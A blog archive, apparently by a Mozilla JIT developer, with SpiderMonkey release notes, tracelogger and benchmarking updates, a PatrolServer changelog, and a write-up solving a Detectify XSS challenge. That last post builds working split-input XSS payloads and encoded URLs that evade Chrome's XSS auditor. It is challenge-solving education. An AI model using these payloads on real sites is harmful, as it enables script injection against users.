Spidermonkey JIT improvements in FF53

On 23th of January the code of Firefox 53 already merged into the stabilization tree. While working on the next releases the code of FF53 has time to stabilize before release on April 18th.

In FF53 a lot has happened. Narrowing down on the JITs, the following was committed:

CacheIR

CacheIR improved drastically in this release. The goal of this project is twofold. One part is to unify the inline caches (IC) stubs in Baseline and IonMonkey. As a result we will only have to implement a new stub once anymore, leading to less code duplication. Secondly it uses an intermediate representation allowing us to reuse parts between stubs.

Starting in this release IonMonkey uses this infrastructure for generating ICs. Also new ICs were ported and we have now complete coverage of JSOP_GETPROP (e.g. reading out obj.prop where obj is an object) and JSOP_GETELEM (e.g. reading out array[42]) in CacheIR. Besides this milestone inline caches for getting DOM expando properties (e.g. properties added on DOM objects) were added, getting own properties of expandos on DOM proxies and lookups of plain data properties on the WindowProxies.

Our regular contributor evilpie helped a lot with this effort and implemented a logger that shows when we are missing specific stubs. This allowed us to find missing edge cases on popular websites. This enabled optimizations notably on Google Docs and Twitter. This work will continue in FF54.

WebAssembly

Since we implemented the draft specification of WebAssembly, we haven’t stopped improving it, be it for throughput or for compilation time and we’ve been polishing our implementation to fix bugs and incorporate last-minute spec changes

In order to improve the experience we have moved validation on the helper thread and we’re doing more of the compilation in parallel. Lastly we added some optimizations to achieve better parallelism while compiling. As a result the compilation of WebAssembly code should be smoother.

IonMonkey

IonMonkey also got its fair share of improvements in this release.

On Google docs we noticed a lot of compilation time was spend in a particular function “FlagAllOperandsAsHavingRemovedUses”. We were able to decrease the time spent in the loop in that function by removing some extra checks. As a result this is now a very tight loop and not visible in profiles anymore.

We adjusted a part of our engine, IonBuilder, which job is to create an SSA graph from a JS script, to return a “Result” type. This annotation will makes it easier to differentiate between different kinds of failures and correctly act on them. It indicated places where we didn’t handle out of memory failures correctly. In the future it will also allow to backtrack after an inlining failure and continue compiling without having to restart over.

Another improvement that happened to IonBuilder is that we now split the creation of the Control Flow Graph (CFG) and the rest of what IonBuilder does. IonBuilder has a lot of different roles and as a result could be cleaner. Also this code is one of the few parts that cannot run on the background thread. This split simplifies the IonBuilder code a bit and allows us to cache the CFG. A recompilation should be a little bit faster now.

Taahir Ahmed added extra code to allow us to constant fold powers. With this code IonMonkey can now use the result of a power with constant, instead of executing it every time at runtime.

Addition to the team

I’m also happy to announce that Ted Campbell has joined the JIT team. He started January 9th and is located in the Toronto office. He is helping the CacheIR project and will also look into making new ECMAScript 2016 features faster in IonMonkey.

Closing notes

This is not a full list of the changes that happened, but should cover the big ones. If you want the full list I would recommend you read the bug list. I want to thank everybody for their hard work. If you are interested in helping out, we have a list of mentored bugs at bugsahoy or you can contact me (h4writer) online at irc.mozilla.org #jsapi.

Spidermonkey JIT improvements in FF52

Last week we signed off our hard work on FF52 and we will start working on FF53. The expected release date of this version is the 6th of March. In the meantime we still have time to stabilize the code and fix issues that we encounter.

In the JavaScript JIT engine a lot of important work was done.

WebAssembly has made great advances. We have fully implemented the draft specification and are requesting final feedback as part of a cross-browser Browser Preview in the W3C WebAssembly Community Group. Assuming the Browser Preview concludes without major changes before 52 is released, we’ll enable WebAssembly by default in 52.

Step by step our CacheIR infrastructure is improving. In this release primitive value getprop was ported to the CacheIR infrastructure.

GC sometimes needs to discard the compilations happening in the helper threads. It seemed like we waited for the compilation to stop one after another. As a result it could take a while till all compilations were discarded. Now we signal all threads at the same time to stop compiling and afterwards wait for all of them to finish. This was a major win in our investment to make sure GC doesn’t interrupt the execution for too long.

The register allocator also received a nice improvement. Sometimes we were adding spills (stack to/from registers moves) while they were not needed. A fix was added to combat this.

Like in every release a long list of differential bugs and crashes have been fixed as well.

This release also include code from contributors:

  • Emanuel Hoogeveen improved our crash annotations. He noticed that we didn’t save the crash reason in our crash reports when using “MOZ_CRASH”.
  • Tooru Fujisawa has been doing incredible work throughout the codebase.
  • Johannes Schulte has landed a patch that improves code for “testArg ? testArg : 0.0” and also eliminates needless control flow.
  • Sander Mathijs van Veen made sure we could use unsigned integer modulo instead of a double modulo operation and also added code to fold additions with multiple constants.
  • André Bargull added code to inline String.fromCodePoint in IonMonkey. As a result the performance should now be equal to using String.fromCharCode
  • Robin Templeton noticed that we were spewing incorrect information in our debug logs and fixed that.
  • Heiher has been updating MIPS to account for all changes we did to platform dependent code for WebAssembly.

I want to thank every one of them for their help! They did a tremendous job! If you are interested in helping out, we have a list of mentored bugs at bugsahoy or you can contact me (h4writer) online at irc.mozilla.org #jsapi.

Request for hardware

Update: I want to thank everybody that has offered a way to access such a netbook. We now have access to the needed hardware and are trying to fix the bug as soon as possible! Much appreciated.

Do you have a netbook (from around 2011) with AMD processor, please take a look if it is bobcat processor (C-30, C-50, C-60, C-70, E-240, E-300, E-350, E-450). If you have one and are willing to help us giving vpn/ssh access please contact me (hverschore [at] mozilla.com).

Improving stability and decreasing crash rate is an ongoing issue for all our teams in Mozilla. That is also true for the JS team. We have fuzzers abusing our JS engine, we review each-others code in order to find bugs, we have static analyzers looking at our code, we have best practices, we look at crash-stats trying to fix the underlying bug … Lately we have identified a source of crashes in our JIT engine on specific hardware. But we haven’t been able to find a solution yet.

Our understanding of the bug is quite limited, but we know it is related to the generated code. We have tried to introduce some work-around to fix this issue, but none have worked yet and the turn-around is quite slow. We have to find a possible way to work-around and release that to nightly and wait for crash-stats to see if it could be fixed.

That is the reason for our call for hardware. We don’t have the hardware our-self and having access to the correct hardware would make it possible to test possible fixes much quicker until we find a possible solution. It would help us a lot.

This is the first time our team tries to leverage our community in order to find specific hardware and I hope it works out. We have a backup plan, but we are hoping that somebody reading this could make our live a little bit easier. We would appreciate it a lot if everybody could see if they still have a laptop/netbook with an bobcat AMD processor (C-30, C-50, C-60, C-70, E-240, E-300, E-350, E-450). E.g. this processor was used in the Asus Eee variant with AMD. If you do please contact me at (hverschore [at] mozilla.com) in order to discuss a way to access the laptop for a limited time.

Performance improvements to tracelogger

Tracelogger is a tool to create traces of the JS engine to investigate or visualize performance issues in SpiderMonkey. Steve Fink has recently been using it to dive into google docs performance and has been hitting some road blocks. The UI became unresponsive and crashing the browser wasn’t uncommon. This is unacceptable and it urged me to improve the performance!

Crash

I looked at the generated log files which were not unacceptable large. The log itself contained 3 million logged items, while I was able to visualize 12 million logged items. The cheer number of logged items was not the cause. I knew that creating the fancy graphs were also not the problem. They have been optimized quite heavily already. That only left the overview as a possible problem.

The overview pane gives an overview of the engines / sub parts we spend time in. Beneath it we see the same, but for the scripts. The computation of this runs in a web worker to not make the browser unresponsive. Once in a while the worker gives back the partial result which the browser renders.

The issue was in the rendering of the partial result. We update this table every time the worker has finished a chunk. Generating the table is generally fast for the workloads I was testing, since there weren’t a lot of different scripts. Though running the full browser gave a lot of different scripts. As a result updating the table became a big overhead. Also you need to know this could happen every 1ms.

The first fix was to make sure we only update this table every 100ms. This is a nice trade-off between seeing the newest information and not making the browser unresponsive. This resulted in far fewer calls to update the table. Up to 100x less.

The next thing I did was to delay the creation of the table. Instead of creating a table it now shows a textual representation of the data. Only upon when the computation is complete it will show the sortable table. This was 10x to 100x faster.

Screenshot of tracelogger

In most cases the UI is now possible to generate the temporary view in 1ms. Though I didn’t want to take any chances. As a result if generating the temporary view takes longer than 100ms it will stop live updating the temporary view and only show the result when finished.

Lastly I also fixed a memory issue. A tracelog log is a tree of where time is spend. This is parsed breadth-first. That is better since it will give a quite good representation quite quickly, even if all the small logged items are not processed yet. But this means the UI needs to keep track of which items will get processed in the next round. This list of items could get unwieldy large. This is now solved by switching to dept-first traversal when that happens. Dept-first traversal needs no additional state to traverse the tree. In my testcase it previously went to 2gb and crashed. With this change the maximum needed memory I saw was 1.2gb and no crash.

Everything has landed in the github repo. Everybody using the tracelogger is advised to pull the newest version and experience the improved performance. As always feel free to report new issues or to contribute in making tracelogger even better.

 

Tracelogger gui updates

Tracelogger is one of the tools JIT devs (especially me) use to look into performance issues and to improve the JS engine of Firefox performance-wise. It traces which functions are executing together with extra information like which engine is running. How long compilation took. How many times we are GC’ing and if we are calling VM functions …

I made the GUI a bit more powerful. First of all I moved the computation of the overview to a web worker. This should help the usability of the tool. Next to that I made it possible to toggle the categories on and off. That might make it easier to understand the graphs. I also introduced a settings popup. In the settings popup you can now choice to see absolute (cpu ticks) or relative (%) timings.

Screenshot from 2016-05-03 09:36:41

There are still a lot of improvements that are possible. Eventually it should be possible to zoom on graphs, toggle scripts on/off, see full times of scripts (instead of self time only) and maybe make it possible to show another graph (like a flame chart). Hopefully one day.

This is off course open source and available at:
https://github.com/h4writer/tracelogger/tree/master/website

Perfherder and regression alerts

In the dawn of arewefastyet only 2 machines were running and only three benchmarks were important. At that time it was quite easy to just iterate the different benchmarks once in a while and spot the regressions. Things have come a long way since. Due to the enormous increase in number of benchmarks and machines I created a regression detector, which wasn’t as easy as it sounds. False positives and false negative are the enemy of such a system. Bimodal benchmarks, noise, compiler perturbations, the amount of datapoints … all didn’t help. Also this had low priority, given I’m supposed to work on  improving JIT performance and not recording JIT performance.

Perfherder came along, which aims to collect any performance data in a central place and to act on that information. Which has some dedicated people working on it. Since the beginning of 2016 AWFY has started to use that system more and more. We have been sending the performance data to Perfherder for a few months now and Perfherder has been improving to allow more and more functionality AWFY needs. Switching the regression detection from AWFY to Perfherder is coming closer, which will remove my largest time drain and allow me to focus even more on the JIT compiler!

The alerts perfherder creates are visible at:
https://treeherder.allizom.org/perf.html#/alerts?status=0&framework=5

Since last week we now can request alerts on the subscores of benchmark, which is quite important for JS benchmarks. Octane has a variance of about 2% and a subscore of the benchmark that regresses with 10% will only decrease the full benchmark score with 1%. As a result this is within the noise levels and won’t get detected. This week this feature was enabled on AWFY, which will increase the correctness and completeness of the alerts Perfherder creates.

I want to thank Joel Maher and William Lachance with the help of this.

 

AWFY now comparing across OS

At the end of last year (2015) we had performance numbers of Firefox compared to the other browser vendors in the shell and on windows 8 and Mac OSX in the browser on different hardware.

This opened requests for better information. We didn’t have any information if Firefox on windows was slower compared to other OS on the same hardware. Also we got requests to run Windows 10 and also to compare to the Edge browser.

Due to these request we decided to find a way to run all OS on the same specification of hardware. In order to do that we ordered 3 mac mini’s and installed the latest flavors of Windows, Mac OSX and Ubuntu on it. Afterwards we got our AWFY slave on each machine and started reporting to the same graph.

Compare OS

Finally we have Edge performance numbers. Their new engine isn’t sub-par with other JS engines. It is quite good! Though there are some side-notes I need to attach to the numbers above. We cannot state enough that Sunspider is actually obsolete. It was a good benchmark at the start of the JS performance race. Now it is mostly annoying, since it is testing wrong things. Not the things you want to/should improve. Next to that octane is still a great benchmarks, except for mandreel latency. That benchmark is totally wrong and we notified the v8 team about it, but we got no response so far. (https://github.com/chromium/octane/issues/29). It is quite sad to see our hard work devalued due to other vendors gaming on that benchmark.

We also have performance across OS for the first time. This showed us our octane score was lower on windows. Over the last few months we have been rectifying this. We still see some slower cold performance due to MSVC 2015 being less eager in inlining fuctions. But our jit performance should be similar across platform now!

 

 

PatrolServer 1.0.1

We at PatrolServer aim to increase security by decreasing vulnerability of public servers on the internet. Last week our product PatrolServer was released to the public in an open beta. This tool continuously monitors outdated software and exploits on your server and informs you.

During the last week, a lot of people have tried this tool and also provided us with vital feedback. We carefully listened to the complaints, suggestions and compliments and also tried to react to all of them. The feedback is greatly appreciated and we will continue to listen to any information of our early-adopters.

In this small timeframe we were able to address some of the comments raised and will implement other suggestions in upcoming releases. Keep your feedback flowing!

New Features:

chathelpWe upgraded our way to submit feedback from within PatrolServer itself by integrating Zendesk. This also has as nice feature that while we are online, we can chat with the original submitter to request more information or help immediately. Search for help or chat inside the tool.

aspnetFor the open beta we were focused on linux servers, since that is our domain and since most servers are served using linux servers. During the release we got some feedback to also support ASP.NET. Therefore we added preliminary support for ASP.NET. The extensiveness of this detection will improve in the future and also IIS is on the roadmap. Stay tuned while we add Microsoft support.

Improvements:

atSome people seem to forget to add any servers or forget to verify their servers. As a result they didn’t get any reports or updates about the vulnerability of their server. To combat this we now send a reminder to everybody that signed up but didn’t add any servers or forgot to verify their server.

smartphoneThe tool is adjusted to work on mobile phones. Here we must thank the people which reported the issues they had on their phones. Normally we should be fully responsive now!

lockWe also added some extra security measurements, e.g. like a country lock. That should make your account even safer.

Full changelog:
- Fix PHP error for older PHP versions with the PHP detector
- Initial support for ASP.NET
- Disable sending mails of outdated software to unverified servers.
- Add a priority to scanning of servers
- Fix overlapping content on mobile
- Add hostmaster as potential verification mailer
- Implement Zendesk support in app
- More aggressively detect php
- Add mailer for empty accounts or not verified servers
- Force ssl on login
- Add second cpe name for nginx
- Add outdated debian versions lenny, etch, sarge
- Ubuntu support for lucid ended and for vivid started
- Keep the cron working without overlap
- Add statistics page
- Stress test: add 25.000 scans simultaneously
- Added more information about our company in the footer
- Added support for versions:
 * mysql: 5.5.43-0ubuntu0.14.10.2, 5.5.43-0ubuntu0.14.04.2,
          5.6.19-1~exp1ubuntu2.1, 5.6.19-0ubuntu0.14.04.2,
          5.5.44-0ubuntu0.14.10.1, 5.5.44-0ubuntu0.14.04.1,
          5.5.44-0ubuntu0.12.04.1, 5.6.19-0ubuntu0.14.04.3,
          5.6.25-0ubuntu0.15.04.1     
 * openssl: 1.0.1p, 1.0.2d
 * php: 5.6.11, 5.5.27, 5.4.43, 5.5.12+dfsg-2ubuntu4.6,
        5.5.9+dfsg-1ubuntu4.11, 5.3.10-1ubuntu3.19
 * apache: 2.4.16, 2.2.31
 * nginx: 1.9.3, 1.6.2-5ubuntu3.1

We hope to address your issue soonish,
The PatrolServer team

In the land of XSS ‘possibly safe’ means ‘exploitable’

XSS (or cross-site scripting) is an attack found in web applications, where malicious people try to inject data into websites in order to steal sensitive data. Despite efforts to decrease the opportunities it still is one of the most used attacks.

Detectify posted an XSS challenge related to a real case they found. The challenge, called “twins of ten”, checks every input and only allows 10 characters per input. To make the challenge even more fun they also required that the solution works with the chrome XSS auditor. This tool is used in Chrome to combat XSS exploits at the users side.

In the challenge one need to break the following php script (which emulates the found issue):

<?php
$q = urldecode($_SERVER['QUERY_STRING']);
$qs = explode('&', $q);
$qa = array();
$chars = 0;
foreach($qs as $q) {
	$q = explode('=', $q);
	array_shift($q);
	$s = implode('=', $q);
	if(strlen($s) > 10) continue;
	$chars += strlen($s);
	$qa[] = $s;
}
foreach($qa as $q) {
	echo "<0123$q><b x=\"x\">foo</b></0123$q>";
}
echo '<!-- '.$chars.' chars long -->';

In this script the input is checked, but not good enough. The authors thought it would be safe to only make sure the inputs are 10 characters long. Ten characters is awfully little. The reasoning behinds this limit is probably along the line that the limit means it is almost impossible to attack. Though if we know something about hackers is that they are perseverant and a little potential crack is enough to get them interested and try to find a way to break it. This also applies to this script and we are going to prove it!

How can we exploit this?

When we go to the web page we can adjust some of the parameters with arbitrary data. The only constraint is that every value can only be 10 characters long:

example.php?a={1}&b={2}&c={3}&d={4}…

This request will generate the following html code. It is visible that the values are injected into the html code without any alteration or checking of values:

<0123{1}><b x="x">foo</b></0123{1}><0123{2}><b x="x">foo</b></0123{2}><0123{3}><b x="x">foo</b></0123{3}><0123{4}><b x="x">foo</b></0123{4}>
...

Our goal is to adjust {1} to {n} and eventually show we can run arbitrary javascript code. For this example we will try to alert something:

<script>alert(1);</script>

Now before going further I would encourage everybody to think about this issue and try it out. It is a fun brain teaser, especially the part to fool the chrome XSS detector. The rest of the post is about a solution I found.

The first thing one need to try is to get a place within a script-tag where we can inject some javascript code. In this example there is no script-tag present, so we are responsible to inject a script-tag ourself. Let’s try this by splitting the tags over different inputs. If we do {1} => “><script>” and {2} => “></script>” we will get:

<0123><script>><b x="x">foo</b></0123><script>><0123></script>><b x="x">foo</b></0123></script>>

This brings us closer. We injected a script open and close tag. That is already good. Only the code inside the tags are nonsense. We need to come up with a way to sanitize this. Due to the limit we don’t have a lot of wiggle room. In most languages there is something to comment the code, e.g. /*, //, <!–. So lets have a look if we can use that here:

{1} => "><script>/*"
{2} => "*/</script>"
<0123><script>/*><b x="x">foo</b></0123><script>/*><0123*/</script>><b x="x">foo</b></0123*/</script>>

This seems to work. We successfully made the code valid by putting the in between html tag become comments. Though we need to address two things.

1) The first item ({1}) is actually 11 characters. This will fail, since only 10 characters are allowed. Luckily for us we can abuse the system a bit, since we can remove the first ‘>’. Almost all browsers will assume the first <0123 actually wasn’t a tag and the user forgot to use &lt;

{1} => "<script>/*"
{2} => "*/</script>"
<0123<script>/*><b x="x">foo</b></0123<script>/*><0123*/</script>><b x="x">foo</b></0123*/</script>>

Which fixes the first issue.

2) Chrome has an XSS auditor in the browser that with some heuristics tries to detects injected javascript code and stops the attack. This measure is to protect their users to make sure that even if a website is vulnerable, the user is still protected. This examples triggers the auditor and as a result the code in between the tags won’t get executed.

The same happens when trying:

{1} => "<script>//"
{2} => "\n</script>"
<0123<script>//><b x="x">foo</b></0123<script>//><0123
</script>><b x="x">foo</b></0123
</script>>

So the hard part about the challenge here was to fool the chrome auditor. There are a lot of examples on how to fool the auditor, but most are already outdated. Chrome improves their auditor, making it harder every time. Though since this is based on heuristics we might find a way to fool the browser.

As a result I searched a bit to get more information about the auditor:

The last link even has some examples that are still possible with the newest chrome release. But I couldn’t use them in my example. But I learned some tricks to fool the auditor. It seems that the content inside the script-tag is compared with the provided input and when that is found it will fail. Also it sometimes doesn’t look at anything behind the “//”. And one need to make sure that most of the code is actually original code, not related the parameters.

I had to try a lot of possible inputs that didn’t fool the auditor, had to almost give up a couple of times, try again, see the auditor calling my bluffs again, reiterating, before I could finally find a snippit that worked.

In order to achieve an attack, I had to fool the auditor that the existing code wasn’t removed, but was still part of the javascript code. That was the reason comments didn’t work. I found that creating unused strings out of them was a strategy the auditor didn’t detect (yet?):

{1} => "<script>//"
{2} => "'\n;'+"
{3} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
;'+><b x="x">foo</b></0123'
;'+><0123'</script><b x="x">foo</b></0123'</script>

So anything we put in {2} after the newline is javascript code that will run. We don’t have much space, since we only have 10 characters and we already use 5 characters to ‘remove’ the extra html code. So we have 5 characters to do something. Another issue that we need to work around is the fact that every 5 characters we write will get executed twice. So we cannot do anything that would be wrong when getting executed twice. But given those constraints we can repeat {2} multiple times to finally start executing vulnerable code.

{2} => "'\nXXXXX;'+"

In order to do this there are probably multiple ways. I went with the idea to create the string “alert”. Which is doable in only 5 characters:

a='a' // 5 chars
l='l' // 5 chars
e='e' // 5 chars
r='r' // 5 chars
t='t' // 5 chars
b=a+l // 5 chars
c=b+e // 5 chars
d=c+r // 5 chars
e=d+t // 5 chars; e now contains "alert"

Now the issues start into invoking the string. It is possible to do this[a] which will return the alert function instead given the string alert. That seems good, but we need 6 characters for this:

t=this // 6 chars;
s=t[e] // 6 chars; s now contains the function alert

s(1) // 4 chars; alert(1)!!! 

Here I went and thought back about the issue why we didn’t use comments instead of strings to hide the existing html tags. We wanted to fool the auditor. Now it seems that after our first little hack, the third input doesn’t need this special format. We fooled the auditor and our third parameter had a little bit of more freedom. As a result I could transform the input to:

{3} => "'\nXXXXXX//"
{1} => "<script>//"
{2} => "'\nfoo1;'+"
{3} => "'\nfoo2//"
{4} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
foo1;'+><b x="x">foo</b></0123'
foo1;'+><0123'
foo2//><b x="x">foo</b></0123'
foo2//><0123'</script><b x="x">foo</b></0123'</script>

Which meant there we have 6 characters at our disposal. Just the amount we needed. There is only one hurdle left. If we run the code with the small chunks listed above we will alert twice. That is not the intention. We want to only alert once. We need to remove the first or second occurrence.

I did this by promoting the first occurrence into the string I used to ‘remove’ the original code.

{1} => "<script>//"
{2} => "'\n;'+"
{3} => "\\\nfoo2;'//"
{4} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
;'+><b x="x">foo</b></0123'
;'+><0123\
foo2;'//><b x="x">foo</b></0123\
foo2;'//><0123'</script><b x="x">foo</b></0123'</script>

Putting this all together we get the following inputs:

{1}  => "<script>//"
{2}  => "'\na='a';'+"
{3}  => "'\nl='l';'+"
{4}  => "'\ne='e';'+"
{5}  => "'\nr='r';'+"
{6}  => "'\nt='t';'+"
{7}  => "'\nb=a+l;'+"
{8}  => "'\nc=b+e;'+"
{9}  => "'\nd=c+r;'+"
{10} => "'\ne=d+t;'+"
{11} => "'\nt=this//"
{12} => "'\nk=t[e]//"
{13} => "\\\nk(1);'//"
{14} => "'</script"

The php script at the beginning of this post can now get compromised just by running: example.php?a=<script>%2F%2F&a=%27%0Aa%3D%27a%27%3B%27%2B&a=%27%0Al%3D%27l%27%3B%27%2B&a=%27%0Ae%3D%27e%27%3B%27%2B&a=%27%0Ar%3D%27r%27%3B%27%2B&a=%27%0At%3D%27t%27%3B%27%2B&a=%27%0Ab%3Da%2Bl%3B%27%2B&a=%27%0Ac%3Db%2Be%3B%27%2B&a=%27%0Ad%3Dc%2Br%3B%27%2B&a=%27%0Ae%3Dd%2Bt%3B%27%2B&a=%27%0At%3Dthis%2F%2F&a=%27%0Ak%3Dt%5Be%5D%2F%2F&a=%5C%0Ak%281%29%3B%27%2F%2F&a=%27<%2Fscript

Edit: this isn’t the smallest possible attack. With some tricks it is possible to write up to 7 characters in a one go. As a result it is not needed to create a string for “alert” and execute it through “this”. But it shows some of the thinking and tricks that can be used to create an attack. The smallest set I found was:

{1}  => "<script>//"
{2}  => "'\n'+"
{3}  => "'\n//"
{4}  => "\ne=alert//"
{5}  => "\\\ne(1);'//"
{6}  => "'</script"

Which yields the following url: example.php?a=%3Cscript%3E%2F%2F&a=%27%0A%27%2B&a=%27%0A%2F%2F&a=%0Ae%3Dalert%2F%2F&a=%5C%0Ae%281%29%3B%27%2F%2F&a=%27%3C%2Fscript

Feel free to take the challenge to better my personal record and contact me on twitter using @patrolserver and I will update this post with your record and name and maybe even buy you a beer ;).